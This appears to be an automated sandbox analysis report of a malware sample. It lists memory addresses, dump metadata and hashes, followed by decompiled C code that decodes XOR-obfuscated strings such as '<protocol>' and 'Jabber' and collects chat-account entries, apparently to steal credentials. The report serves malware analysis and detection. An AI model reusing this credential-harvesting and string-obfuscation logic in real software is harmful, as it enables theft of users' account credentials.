                                    0x00821d20
                                    0x00821d20
                                    0x00821d2b
                                    0x00821d35
                                    0x00821d42
                                    0x00822448
                                    0x0082244d
                                    0x00822457
                                    0x0082245c
                                    0x0082245e
                                    0x008226cf
                                    0x008226d5
                                    0x008226e0
                                    0x008226eb
                                    0x008226f5
                                    0x008226fe
                                    0x008226fe
                                    0x00822466
                                    0x00822472
                                    0x00822476
                                    0x0082247d
                                    0x00822481
                                    0x00822492
                                    0x0082249c
                                    0x008224a4
                                    0x008224b1
                                    0x008224c1
                                    0x008224cb
                                    0x008224d1
                                    0x008224d2
                                    0x008224d3
                                    0x008224dd
                                    0x008224e0
                                    0x008224eb
                                    0x008224f6
                                    0x00822501
                                    0x0082250c
                                    0x00822517
                                    0x0082251b
                                    0x00822520
                                    0x00822529
                                    0x0082252b
                                    0x0082252f
                                    0x00822532
                                    0x00822535
                                    0x0082253a
                                    0x0082253d
                                    0x00822541
                                    0x0082254a
                                    0x0082254d
                                    0x00822550
                                    0x00822555
                                    0x00822559
                                    0x0082255e
                                    0x0082256b
                                    0x0082256e
                                    0x00822575
                                    0x00822583
                                    0x00822588
                                    0x0082258c
                                    0x00822593
                                    0x00822595
                                    0x00822599
                                    0x0082259f
                                    0x008225a6
                                    0x008225ab
                                    0x008225b3
                                    0x008225be
                                    0x008225c8
                                    0x008225cd
                                    0x008225d4
                                    0x008225d9
                                    0x008225b3
                                    0x008225da
                                    0x008225e1
                                    0x008225f2
                                    0x008225f2
                                    0x008225f7
                                    0x008225fe
                                    0x00822605
                                    0x0082260b
                                    0x00822613
                                    0x00822618
                                    0x00822620
                                    0x00822622
                                    0x00822625
                                    0x0082262d
                                    0x00822632
                                    0x00822638
                                    0x0082263e
                                    0x00822644
                                    0x00822620
                                    0x00822645
                                    0x0082264c
                                    0x0082265b
                                    0x0082266b
                                    0x00822678
                                    0x00822682
                                    0x00822687
                                    0x00822688
                                    0x0082268c
                                    0x00822690
                                    0x00822692
                                    0x00822692
                                    0x00822694
                                    0x00822695
                                    0x00822696
                                    0x0082269f
                                    0x008226ad
                                    0x008226b8
                                    0x008226c3
                                    0x008226ca
                                    0x00000000
                                    0x0082264e
                                    0x0082264e
                                    0x0082264e
                                    0x00822655
                                    0x00822656
                                    0x00822656
                                    0x00000000
                                    0x0082264e
                                    0x008225e3
                                    0x008225e3
                                    0x008225e5
                                    0x008225e5
                                    0x008225ec
                                    0x008225ed
                                    0x008225ed
                                    0x00000000
                                    0x008225e5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00821d48
                                    0x00821d48
                                    0x00821d48
                                    0x00821d4c
                                    0x00821d4e
                                    0x00821d53
                                    0x00821d5a
                                    0x00821d61
                                    0x00821d67
                                    0x00821d6b
                                    0x00821d74
                                    0x00821d7b
                                    0x00821d80
                                    0x00821d87
                                    0x00821d88
                                    0x00821d8a
                                    0x00821d97
                                    0x00821d98
                                    0x00821d99
                                    0x00821d9b
                                    0x00821d9c
                                    0x00821da1
                                    0x00821da8
                                    0x00821dad
                                    0x00821db0
                                    0x00821db0
                                    0x00821d88
                                    0x00821db8
                                    0x00821dc9
                                    0x00821dc9
                                    0x00821dcf
                                    0x00821ddd
                                    0x00000000
                                    0x00000000
                                    0x00821de3
                                    0x00821de8
                                    0x00821def
                                    0x00821df6
                                    0x00821dfc
                                    0x00821e06
                                    0x00821e0d
                                    0x00821e12
                                    0x00821e19
                                    0x00821e1a
                                    0x00821e1c
                                    0x00821e29
                                    0x00821e2a
                                    0x00821e2b
                                    0x00821e2d
                                    0x00821e2e
                                    0x00821e33
                                    0x00821e3a
                                    0x00821e3f
                                    0x00821e42
                                    0x00821e42
                                    0x00821e1a
                                    0x00821e4a
                                    0x00821e5b
                                    0x00821e5b
                                    0x00821e77
                                    0x00821e7d
                                    0x00821e83
                                    0x00821e88
                                    0x00821e8d
                                    0x00821e97
                                    0x00821ea1
                                    0x00821eb1
                                    0x00821eb8
                                    0x00821ebd
                                    0x00821ec4
                                    0x00821ec5
                                    0x00821ec7
                                    0x00821ed7
                                    0x00821ed8
                                    0x00821ed9
                                    0x00821eda
                                    0x00821edf
                                    0x00821ee6
                                    0x00821eeb
                                    0x00821eee
                                    0x00821eee
                                    0x00821ec5
                                    0x00821ef6
                                    0x00821f07
                                    0x00821f07
                                    0x00821f18
                                    0x00821f27
                                    0x00821f2c
                                    0x00821f2e
                                    0x00821f31
                                    0x00821f35
                                    0x00821f3a
                                    0x00821f41
                                    0x00821f48
                                    0x00821f4e
                                    0x00821f58
                                    0x00821f5f
                                    0x00821f64
                                    0x00821f6b
                                    0x00821f6c
                                    0x00821f6e
                                    0x00821f7b
                                    0x00821f7c
                                    0x00821f7d
                                    0x00821f7f
                                    0x00821f80
                                    0x00821f85
                                    0x00821f8c
                                    0x00821f91
                                    0x00821f94
                                    0x00821f95
                                    0x00821f95
                                    0x00821f9f
                                    0x00821fb0
                                    0x00821fbc
                                    0x00821fc9
                                    0x00821fd3
                                    0x00821fe0
                                    0x00821fe4
                                    0x00821fef
                                    0x00821ffa
                                    0x00821fff
                                    0x00822005
                                    0x00822009
                                    0x0082200e
                                    0x00822013
                                    0x0082201a
                                    0x00822020
                                    0x0082202a
                                    0x00822031
                                    0x00822036
                                    0x0082203d
                                    0x0082203e
                                    0x00822040
                                    0x0082204d
                                    0x0082204e
                                    0x00822050
                                    0x00822051
                                    0x00822056
                                    0x0082205d
                                    0x00822062
                                    0x00822065
                                    0x00822065
                                    0x0082203e
                                    0x0082206d
                                    0x0082207e
                                    0x0082207e
                                    0x0082209a
                                    0x008220a0
                                    0x008220a6
                                    0x008220ab
                                    0x008220b0
                                    0x008220b7
                                    0x008220c4
                                    0x008220cb
                                    0x008220d0
                                    0x008220d7
                                    0x008220d8
                                    0x008220e5
                                    0x008220ea
                                    0x008220f0
                                    0x008220f5
                                    0x008220fc
                                    0x00822101
                                    0x00822101
                                    0x008220d8
                                    0x00822109
                                    0x0082211a
                                    0x0082211a
                                    0x0082212b
                                    0x0082213a
                                    0x0082213f
                                    0x00822141
                                    0x00822144
                                    0x00822148
                                    0x0082214d
                                    0x00822154
                                    0x0082215a
                                    0x00822164
                                    0x0082216b
                                    0x00822170
                                    0x00822177
                                    0x00822178
                                    0x0082217a
                                    0x00822187
                                    0x00822188
                                    0x0082218a
                                    0x0082218b
                                    0x00822190
                                    0x00822197
                                    0x0082219c
                                    0x0082219f
                                    0x008221a0
                                    0x008221a0
                                    0x008221aa
                                    0x008221bb
                                    0x008221c7
                                    0x008221d4
                                    0x008221de
                                    0x008221eb
                                    0x008221ef
                                    0x008221fa
                                    0x00822205
                                    0x0082220a
                                    0x00822210
                                    0x00822214
                                    0x00822219
                                    0x0082221e
                                    0x00822225
                                    0x0082222c
                                    0x00822232
                                    0x0082223c
                                    0x00822243
                                    0x00822248
                                    0x0082224f
                                    0x00822250
                                    0x00822252
                                    0x0082225f
                                    0x00822260
                                    0x00822261
                                    0x00822263
                                    0x00822264
                                    0x00822269
                                    0x00822270
                                    0x00822275
                                    0x00822278
                                    0x00822278
                                    0x00822250
                                    0x00822280
                                    0x00822291
                                    0x00822291
                                    0x008222ad
                                    0x008222b3
                                    0x008222b9
                                    0x008222be
                                    0x008222c3
                                    0x008222ca
                                    0x008222d1
                                    0x008222de
                                    0x008222e5
                                    0x008222ea
                                    0x008222f1
                                    0x008222f2
                                    0x008222f4
                                    0x00822301
                                    0x00822302
                                    0x00822303
                                    0x00822304
                                    0x00822309
                                    0x00822310
                                    0x00822315
                                    0x00822318
                                    0x00822318
                                    0x008222f2
                                    0x00822320
                                    0x00822331
                                    0x00822331
                                    0x00822342
                                    0x00822351
                                    0x00822356
                                    0x00822358
                                    0x0082235b
                                    0x0082235f
                                    0x00822364
                                    0x0082236b
                                    0x00822371
                                    0x0082237b
                                    0x00822382
                                    0x00822387
                                    0x0082238e
                                    0x0082238f
                                    0x00822391
                                    0x0082239e
                                    0x0082239f
                                    0x008223a1
                                    0x008223a2
                                    0x008223a7
                                    0x008223ae
                                    0x008223b3
                                    0x008223b4
                                    0x008223b4
                                    0x008223be
                                    0x008223cf
                                    0x008223db
                                    0x008223e8
                                    0x008223f2
                                    0x008223ff
                                    0x00822403
                                    0x0082240e
                                    0x00822419
                                    0x0082241e
                                    0x00822424
                                    0x00822433
                                    0x0082243a
                                    0x00000000
                                    0x008223c0
                                    0x008223c0
                                    0x008223c2
                                    0x008223c2
                                    0x008223c9
                                    0x008223ca
                                    0x008223ca
                                    0x00000000
                                    0x008223c2
                                    0x00822322
                                    0x00822322
                                    0x00822324
                                    0x00822324
                                    0x0082232b
                                    0x0082232c
                                    0x00000000
                                    0x00822324
                                    0x00822282
                                    0x00822282
                                    0x00822284
                                    0x00822284
                                    0x0082228b
                                    0x0082228c
                                    0x00000000
                                    0x00822284
                                    0x008221ac
                                    0x008221ac
                                    0x008221ae
                                    0x008221ae
                                    0x008221b5
                                    0x008221b6
                                    0x008221b6
                                    0x00000000
                                    0x008221ae
                                    0x0082210b
                                    0x0082210b
                                    0x0082210d
                                    0x0082210d
                                    0x00822114
                                    0x00822115
                                    0x00000000
                                    0x0082210d
                                    0x0082206f
                                    0x0082206f
                                    0x00822071
                                    0x00822071
                                    0x00822078
                                    0x00822079
                                    0x00000000
                                    0x00822071
                                    0x00821fa1
                                    0x00821fa1
                                    0x00821fa3
                                    0x00821fa3
                                    0x00821faa
                                    0x00821fab
                                    0x00821fab
                                    0x00000000
                                    0x00821fa3
                                    0x00821ef8
                                    0x00821ef8
                                    0x00821efa
                                    0x00821efa
                                    0x00821f01
                                    0x00821f02
                                    0x00000000
                                    0x00821efa
                                    0x00821e4c
                                    0x00821e4c
                                    0x00821e4e
                                    0x00821e4e
                                    0x00821e55
                                    0x00821e56
                                    0x00000000
                                    0x00821e4e
                                    0x00821dba
                                    0x00821dba
                                    0x00821dbc
                                    0x00821dbc
                                    0x00821dc3
                                    0x00821dc4
                                    0x00000000
                                    0x00821dbc
                                    0x00821db8
                                    0x00821d48
                                    0x00821c59
                                    0x00821c59
                                    0x00821c5b
                                    0x00821c5b
                                    0x00821c62
                                    0x00821c63
                                    0x00000000
                                    0x00821c5b

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                    • String ID: .$.$.$.$.$.$.$.$AMAB$AZAM$B.$ZAMA$ZAMA$]YA\$]]YA$`OCK$dOLLK\r.$~O]]$~\AZ
                                    • API String ID: 2013694253-1663802069
                                    • Opcode ID: 8f2a061c581d24284bc8bc678503222b7e43f994f24c5651384a29077b7907fa
                                    • Instruction ID: fcf086d62dc1ebaea775795a28cf526087be08fcbd3f9f0e7c290322d3dce184
                                    • Opcode Fuzzy Hash: 8f2a061c581d24284bc8bc678503222b7e43f994f24c5651384a29077b7907fa
                                    • Instruction Fuzzy Hash: 0952C3309047A89ECB15EBA8E846BDDBBB0FF15310F150198E155FB392DBB41AC9CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00822431 Relevance: 20.5, Strings: 16, Instructions: 451COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 66%
                                    			E00822431(void* __edx) {
				intOrPtr _t199;
				char _t201;
				void* _t204;
				void* _t206;
				void* _t207;
				void* _t209;
				intOrPtr _t221;
				intOrPtr _t222;
				void* _t223;
				intOrPtr* _t224;
				intOrPtr _t233;
				intOrPtr _t239;
				void* _t242;
				intOrPtr _t244;
				intOrPtr _t247;
				intOrPtr _t248;
				void* _t249;
				void* _t250;
				intOrPtr _t255;
				void* _t258;
				intOrPtr _t260;
				intOrPtr _t263;
				intOrPtr _t264;
				void* _t265;
				void* _t266;
				void* _t274;
				intOrPtr _t276;
				intOrPtr _t279;
				intOrPtr _t280;
				void* _t281;
				void* _t282;
				intOrPtr _t287;
				intOrPtr _t291;
				intOrPtr _t295;
				intOrPtr _t299;
				intOrPtr _t303;
				intOrPtr _t308;
				intOrPtr _t312;
				intOrPtr _t316;
				intOrPtr _t320;
				intOrPtr _t324;
				intOrPtr _t328;
				void* _t330;
				void* _t331;
				intOrPtr _t350;
				void* _t351;
				void* _t355;
				intOrPtr _t356;
				void* _t369;
				void* _t380;
				void* _t383;
				void* _t394;
				void* _t397;
				void* _t408;
				void* _t410;
				void* _t413;
				void* _t417;
				void* _t418;
				void* _t430;
				void* _t432;
				intOrPtr _t434;
				intOrPtr* _t436;
				intOrPtr _t437;
				void* _t441;
				void* _t451;
				intOrPtr* _t453;
				intOrPtr _t455;
				void* _t456;
				intOrPtr* _t457;

				_t328 = 0;
				while(1) {
					 *((intOrPtr*)(_t451 - 4)) = 2;
					_t436 =  *[fs:0x2c];
					 *((char*)(_t451 - 4)) = 4;
					_t437 =  *_t436;
					_t199 =  *0x8b4f3c; // 0x0
					 *((intOrPtr*)(_t451 - 0x5c)) = 0x415c5e12;
					 *((intOrPtr*)(_t451 - 0x58)) = 0x414d415a;
					 *((short*)(_t451 - 0x54)) = 0x1042;
					 *((char*)(_t451 - 0x52)) = 0x2e;
					 *((intOrPtr*)(_t451 - 0x18)) = _t437;
					if(_t199 >  *((intOrPtr*)(_t437 + 4))) {
						E0086DB91(_t199, 0x8b4f3c);
						_t461 =  *0x8b4f3c - 0xffffffff;
						_pop(_t330);
						if( *0x8b4f3c == 0xffffffff) {
							_t430 = 0x8b5da0;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							L0086DFE8(_t330, _t461, 0x895c86);
							 *_t453 = 0x8b4f3c;
							L0086DB47();
							_t437 =  *((intOrPtr*)(_t451 - 0x18));
							_pop(_t330);
						}
					}
					if( *0x8b5daa == 0) {
						L7:
						_push(_t330);
						_t331 = _t451 - 0x98;
						if(E0082D960(_t331, 0x8b5da0) == 0xffffffff) {
							 *((char*)(_t451 - 4)) = 0xf;
							_t201 = E0082EA7D(_t451 - 0xe0, 0x8a43ab, _t430, _t437);
							__eflags = _t201;
							if(_t201 != 0) {
								L82:
								E0082DF41(_t451 - 0x98);
								E0082DF41(_t451 - 0xe0);
								_t204 = E0082DF41(_t451 - 0x128);
								 *[fs:0x0] =  *((intOrPtr*)(_t451 - 0xc));
								return _t204;
							}
							_t417 = 3;
							_t432 = L00818F5D(_t328, _t451 - 0x158, _t417);
							_t418 = 0x13;
							 *((char*)(_t451 - 4)) = 0x10;
							_t206 = L00818F5D(_t328, _t451 - 0x140, _t418);
							 *((char*)(_t451 - 4)) = 0x11;
							_t207 = E0082E8C7(_t328, _t451 - 0xf8, 0x8b2a8c, _t432);
							 *((char*)(_t451 - 4)) = 0x12;
							E0082FA3B(_t451 - 0xc8,  *((intOrPtr*)(_t451 - 0x14)), _t207, _t206, "\\");
							 *((char*)(_t451 - 4)) = 0x13;
							_t209 = E0082E917(_t451 - 0x110, _t451 - 0xc8, __eflags, ".");
							_push(_t432);
							_push(_t209);
							 *((char*)(_t451 - 4)) = 0x14;
							_push( *((intOrPtr*)(_t451 - 0x14)));
							E0082FA3B(_t451 - 0xb0);
							E0082DF41(_t451 - 0x110);
							E0082DF41(_t451 - 0xc8);
							E0082DF41(_t451 - 0xf8);
							E0082DF41(_t451 - 0x140);
							 *((char*)(_t451 - 4)) = 0x1a;
							E0082DF41(_t451 - 0x158);
							_t455 = _t453 - 0x18;
							_t350 = _t455;
							 *((intOrPtr*)(_t451 - 0x14)) = _t455;
							 *((intOrPtr*)(_t350 + 0x10)) = _t328;
							 *((intOrPtr*)(_t350 + 0x14)) = _t328;
							E0082E0AB(_t350, _t451 - 0xe0);
							_t456 = _t455 - 0x18;
							 *((char*)(_t451 - 4)) = 0x1b;
							_t351 = _t456;
							 *((intOrPtr*)(_t351 + 0x10)) = _t328;
							 *((intOrPtr*)(_t351 + 0x14)) = _t328;
							E0082E0AB(_t351, _t451 - 0xb0);
							 *((char*)(_t451 - 4)) = 0x1a;
							E00818DC6(_t451 - 0xc8);
							asm("movaps xmm0, [0x8a9160]");
							_t457 = _t456 + 0x30;
							__eflags =  *((intOrPtr*)(_t451 - 0x9c)) - 0x10;
							_t441 =  >=  ?  *((void*)(_t451 - 0xb0)) : _t451 - 0xb0;
							_t221 =  *0x8b5a60; // 0x0
							asm("movups [ebp-0x38], xmm0");
							 *((intOrPtr*)(_t451 - 0x28)) = 0x5a565a00;
							_t434 =  *((intOrPtr*)( *[fs:0x2c]));
							 *((char*)(_t451 - 0x24)) = 0x2e;
							__eflags = _t221 -  *((intOrPtr*)(_t434 + 4));
							if(_t221 >  *((intOrPtr*)(_t434 + 4))) {
								E0086DB91(_t221, 0x8b5a60);
								__eflags =  *0x8b5a60 - 0xffffffff;
								if( *0x8b5a60 == 0xffffffff) {
									E0082D54D(0x8b5214, _t451 - 0x38);
									L0086DFE8(0x8b5214, __eflags, 0x895be7);
									 *_t457 = 0x8b5a60;
									L0086DB47();
								}
							}
							__eflags =  *0x8b5228;
							if( *0x8b5228 == 0) {
								L74:
								_t222 =  *0x8b5d34; // 0x0
								 *((intOrPtr*)(_t451 - 0x20)) = 0x4c4c4f64;
								 *((intOrPtr*)(_t451 - 0x1c)) = 0x2e725c4b;
								__eflags = _t222 -  *((intOrPtr*)(_t434 + 4));
								if(_t222 >  *((intOrPtr*)(_t434 + 4))) {
									E0086DB91(_t222, 0x8b5d34);
									__eflags =  *0x8b5d34 - 0xffffffff;
									if(__eflags == 0) {
										_t183 = _t451 - 0x20; // 0x4c4c4f64
										_t184 = _t451 - 0x1c; // 0x2e725c4b
										 *0x8b5fb4 =  *_t183;
										 *0x8b5fb8 =  *_t184;
										L0086DFE8( *_t184, __eflags, 0x895bf7);
										L0086DB47(0x8b5d34);
									}
								}
								__eflags =  *0x8b5fbb;
								if( *0x8b5fbb == 0) {
									L79:
									_t223 = E0082E9EC(_t328, _t451 - 0x188, 0x8b5fb4);
									 *((char*)(_t451 - 4)) = 0x1c;
									_t224 = E0082E917(_t451 - 0x170, _t223, __eflags, 0x8b5214);
									_t355 = 0x8b2abc;
									 *((char*)(_t451 - 4)) = 0x1d;
									__eflags =  *((intOrPtr*)(_t224 + 0x14)) - 0x10;
									if( *((intOrPtr*)(_t224 + 0x14)) >= 0x10) {
										_t224 =  *_t224;
									}
									_push(_t355);
									_push(_t355);
									_t356 =  *0x8b4804; // 0x1346140
									E008183DF(_t356, _t224, _t441);
									E0082DF41(_t451 - 0x170);
									E0082DF41(_t451 - 0x188);
									 *0x8b488a = 1;
									E0082DF41(_t451 - 0xb0);
									goto L82;
								} else {
									do {
										 *(_t328 + 0x8b5fb4) =  *(_t328 + 0x8b5fb4) ^ 0x0000002e;
										_t328 = _t328 + 1;
										__eflags = _t328 - 8;
									} while (_t328 < 8);
									goto L79;
								}
							} else {
								_t233 = _t328;
								do {
									 *(_t233 + 0x8b5214) =  *(_t233 + 0x8b5214) ^ 0x0000002e;
									_t233 = _t233 + 1;
									__eflags = _t233 - 0x15;
								} while (_t233 < 0x15);
								goto L74;
							}
						} else {
							_t239 =  *0x8b5018; // 0x0
							 *((intOrPtr*)(_t451 - 0x68)) = 0x415c5e12;
							 *((intOrPtr*)(_t451 - 0x64)) = 0x414d415a;
							 *((short*)(_t451 - 0x60)) = 0x1042;
							 *((char*)(_t451 - 0x5e)) = 0x2e;
							if(_t239 >  *((intOrPtr*)(_t437 + 4))) {
								E0086DB91(_t239, 0x8b5018);
								_t466 =  *0x8b5018 - 0xffffffff;
								_pop(_t331);
								if( *0x8b5018 == 0xffffffff) {
									_t430 = 0x8b5fcc;
									asm("movsd");
									asm("movsd");
									asm("movsw");
									asm("movsb");
									L0086DFE8(_t331, _t466, 0x895c77);
									 *_t453 = 0x8b5018;
									L0086DB47();
									_t437 =  *((intOrPtr*)(_t451 - 0x18));
									_pop(_t331);
								}
							}
							if( *0x8b5fd6 == 0) {
								L14:
								_push(_t331);
								_t242 = L0082DFA2(_t451 - 0x98, _t328, E0082D960(_t451 - 0x98, 0x8b5fcc) + 0xa);
								_t369 = _t451 - 0x98;
								E0082DA01(_t369, _t242);
								_t244 =  *0x8b5318; // 0x0
								 *((intOrPtr*)(_t451 - 0xa4)) = 0x5c5e0112;
								 *((intOrPtr*)(_t451 - 0xa0)) = 0x4d415a41;
								 *((intOrPtr*)(_t451 - 0x9c)) = 0x2e104241;
								if(_t244 >  *((intOrPtr*)(_t437 + 4))) {
									E0086DB91(_t244, 0x8b5318);
									_t470 =  *0x8b5318 - 0xffffffff;
									_pop(_t369);
									if( *0x8b5318 == 0xffffffff) {
										_t430 = 0x8b5cc8;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										L0086DFE8(_t369, _t470, 0x895c5b);
										 *_t453 = 0x8b5318;
										L0086DB47();
										_t437 =  *((intOrPtr*)(_t451 - 0x18));
										_pop(_t369);
									}
								}
								if( *0x8b5cd3 == 0) {
									L20:
									_push(_t369);
									_push(E0082D960(_t451 - 0x98, 0x8b5cc8));
									_t247 = E0082D8D6(_t451 - 0x98, _t430, _t451 - 0x110, _t328);
									_t372 = _t247;
									 *((intOrPtr*)(_t451 - 0x14)) = _t247;
									 *((char*)(_t451 - 4)) = 5;
									_t248 =  *0x8b542c; // 0x0
									 *((intOrPtr*)(_t451 - 0x74)) = 0x5a415c7e;
									 *((intOrPtr*)(_t451 - 0x70)) = 0x42414d41;
									 *((short*)(_t451 - 0x6c)) = 0xe14;
									 *((char*)(_t451 - 0x6a)) = 0x2e;
									if(_t248 >  *((intOrPtr*)(_t437 + 4))) {
										E0086DB91(_t248, 0x8b542c);
										_t474 =  *0x8b542c - 0xffffffff;
										_pop(_t413);
										if( *0x8b542c == 0xffffffff) {
											_t430 = 0x8b4bb8;
											asm("movsd");
											asm("movsd");
											asm("movsw");
											asm("movsb");
											L0086DFE8(_t413, _t474, 0x895c68);
											 *_t453 = 0x8b542c;
											L0086DB47();
											_t437 =  *((intOrPtr*)(_t451 - 0x18));
										}
										_t372 =  *((intOrPtr*)(_t451 - 0x14));
									}
									if( *0x8b4bc2 == 0) {
										L27:
										_t249 = E0082EA3D(_t451 - 0xf8, 0x8b4bb8, _t372);
										 *((char*)(_t451 - 4)) = 6;
										_t250 = E0082E917(_t451 - 0xc8, _t249, _t476, "\n");
										 *((char*)(_t451 - 4)) = 7;
										E0082D9E5(_t250);
										E0082DF41(_t451 - 0xc8);
										E0082DF41(_t451 - 0xf8);
										_t380 = _t451 - 0x110;
										 *((char*)(_t451 - 4)) = 4;
										E0082DF41(_t380);
										_t255 =  *0x8b5ba8; // 0x0
										 *((intOrPtr*)(_t451 - 0x40)) = 0x434f4012;
										 *((short*)(_t451 - 0x3c)) = 0x104b;
										 *((char*)(_t451 - 0x3a)) = 0x2e;
										if(_t255 >  *((intOrPtr*)(_t437 + 4))) {
											E0086DB91(_t255, 0x8b5ba8);
											_t478 =  *0x8b5ba8 - 0xffffffff;
											_pop(_t380);
											if( *0x8b5ba8 == 0xffffffff) {
												_t430 = 0x8b5e20;
												asm("movsd");
												asm("movsw");
												asm("movsb");
												L0086DFE8(_t380, _t478, 0x895c4d);
												 *_t453 = 0x8b5ba8;
												L0086DB47();
												_t437 =  *((intOrPtr*)(_t451 - 0x18));
												_pop(_t380);
											}
										}
										if( *0x8b5e26 == 0) {
											L33:
											_push(_t380);
											_t258 = L0082DFA2(_t451 - 0x98, _t328, E0082D960(_t451 - 0x98, 0x8b5e20) + 6);
											_t383 = _t451 - 0x98;
											E0082DA01(_t383, _t258);
											_t260 =  *0x8b4ba4; // 0x0
											 *((intOrPtr*)(_t451 - 0x20)) = 0x4f400112;
											 *((intOrPtr*)(_t451 - 0x1c)) = 0x2e104b43;
											if(_t260 >  *((intOrPtr*)(_t437 + 4))) {
												E0086DB91(_t260, 0x8b4ba4);
												_t482 =  *0x8b4ba4 - 0xffffffff;
												_pop(_t383);
												if( *0x8b4ba4 == 0xffffffff) {
													 *0x8b4dac =  *((intOrPtr*)(_t451 - 0x20));
													 *0x8b4db0 =  *((intOrPtr*)(_t451 - 0x1c));
													L0086DFE8( *((intOrPtr*)(_t451 - 0x1c)), _t482, 0x895c30);
													 *_t453 = 0x8b4ba4;
													L0086DB47();
													_pop(_t383);
												}
											}
											if( *0x8b4db3 == 0) {
												L39:
												_push(_t383);
												_push(E0082D960(_t451 - 0x98, 0x8b4dac));
												_t263 = E0082D8D6(_t451 - 0x98, _t430, _t451 - 0xc8, _t328);
												_t386 = _t263;
												 *((intOrPtr*)(_t451 - 0x14)) = _t263;
												 *((char*)(_t451 - 4)) = 8;
												_t264 =  *0x8b4e9c; // 0x0
												 *((intOrPtr*)(_t451 - 0x48)) = 0x4b434f60;
												 *((short*)(_t451 - 0x44)) = 0xe14;
												 *((char*)(_t451 - 0x42)) = 0x2e;
												if(_t264 >  *((intOrPtr*)(_t437 + 4))) {
													E0086DB91(_t264, 0x8b4e9c);
													_t486 =  *0x8b4e9c - 0xffffffff;
													_pop(_t410);
													if( *0x8b4e9c == 0xffffffff) {
														_t430 = 0x8b51bc;
														asm("movsd");
														asm("movsw");
														asm("movsb");
														L0086DFE8(_t410, _t486, 0x895c3f);
														 *_t453 = 0x8b4e9c;
														L0086DB47();
														_t437 =  *((intOrPtr*)(_t451 - 0x18));
													}
													_t386 =  *((intOrPtr*)(_t451 - 0x14));
												}
												if( *0x8b51c2 == 0) {
													L46:
													_t265 = E0082EA3D(_t451 - 0xf8, 0x8b51bc, _t386);
													 *((char*)(_t451 - 4)) = 9;
													_t266 = E0082E917(_t451 - 0x110, _t265, _t488, "\n");
													 *((char*)(_t451 - 4)) = 0xa;
													E0082D9E5(_t266);
													E0082DF41(_t451 - 0x110);
													E0082DF41(_t451 - 0xf8);
													_t394 = _t451 - 0xc8;
													 *((char*)(_t451 - 4)) = 4;
													E0082DF41(_t394);
													_t271 =  *0x8b60c8;
													 *((intOrPtr*)(_t451 - 0x80)) = 0x5d4f5e12;
													 *((intOrPtr*)(_t451 - 0x7c)) = 0x5c41595d;
													 *((short*)(_t451 - 0x78)) = 0x104a;
													 *((char*)(_t451 - 0x76)) = 0x2e;
													if( *0x8b60c8 >  *((intOrPtr*)(_t437 + 4))) {
														E0086DB91(_t271, 0x8b60c8);
														_t490 =  *0x8b60c8 - 0xffffffff;
														_pop(_t394);
														if( *0x8b60c8 == 0xffffffff) {
															_t430 = 0x8b5a64;
															asm("movsd");
															asm("movsd");
															asm("movsw");
															asm("movsb");
															L0086DFE8(_t394, _t490, 0x895c21);
															 *_t453 = 0x8b60c8;
															L0086DB47();
															_t437 =  *((intOrPtr*)(_t451 - 0x18));
															_pop(_t394);
														}
													}
													if( *0x8b5a6e == 0) {
														L52:
														_push(_t394);
														_t274 = L0082DFA2(_t451 - 0x98, _t328, E0082D960(_t451 - 0x98, 0x8b5a64) + 0xa);
														_t397 = _t451 - 0x98;
														E0082DA01(_t397, _t274);
														_t276 =  *0x8b5324; // 0x0
														 *((intOrPtr*)(_t451 - 0x2c)) = 0x4f5e0112;
														 *((intOrPtr*)(_t451 - 0x28)) = 0x41595d5d;
														 *((intOrPtr*)(_t451 - 0x24)) = 0x2e104a5c;
														if(_t276 >  *((intOrPtr*)(_t437 + 4))) {
															E0086DB91(_t276, 0x8b5324);
															_t494 =  *0x8b5324 - 0xffffffff;
															_pop(_t397);
															if( *0x8b5324 == 0xffffffff) {
																_t430 = 0x8b5bf8;
																asm("movsd");
																asm("movsd");
																asm("movsd");
																L0086DFE8(_t397, _t494, 0x895c06);
																 *_t453 = 0x8b5324;
																L0086DB47();
																_t437 =  *((intOrPtr*)(_t451 - 0x18));
																_pop(_t397);
															}
														}
														if( *0x8b5c03 == 0) {
															L58:
															_push(_t397);
															_push(E0082D960(_t451 - 0x98, 0x8b5bf8));
															_t279 = E0082D8D6(_t451 - 0x98, _t430, _t451 - 0xc8, _t328);
															_t400 = _t279;
															 *((intOrPtr*)(_t451 - 0x14)) = _t279;
															 *((char*)(_t451 - 4)) = 0xb;
															_t280 =  *0x8b5d3c; // 0x0
															 *((intOrPtr*)(_t451 - 0x50)) = 0x5d5d4f7e;
															 *((short*)(_t451 - 0x4c)) = 0xe14;
															 *((char*)(_t451 - 0x4a)) = 0x2e;
															if(_t280 >  *((intOrPtr*)(_t437 + 4))) {
																E0086DB91(_t280, 0x8b5d3c);
																_t498 =  *0x8b5d3c - 0xffffffff;
																_pop(_t408);
																if( *0x8b5d3c == 0xffffffff) {
																	_t430 = 0x8b51cc;
																	asm("movsd");
																	asm("movsw");
																	asm("movsb");
																	L0086DFE8(_t408, _t498, 0x895c13);
																	 *_t453 = 0x8b5d3c;
																	L0086DB47();
																}
																_t400 =  *((intOrPtr*)(_t451 - 0x14));
															}
															if( *0x8b51d2 == 0) {
																L65:
																_t281 = E0082EA3D(_t451 - 0xf8, 0x8b51cc, _t400);
																 *((char*)(_t451 - 4)) = 0xc;
																_t282 = E0082E917(_t451 - 0x110, _t281, _t500, "\n\n");
																 *((char*)(_t451 - 4)) = 0xd;
																E0082D9E5(_t282);
																E0082DF41(_t451 - 0x110);
																E0082DF41(_t451 - 0xf8);
																_t330 = _t451 - 0xc8;
																E0082DF41(_t330);
																continue;
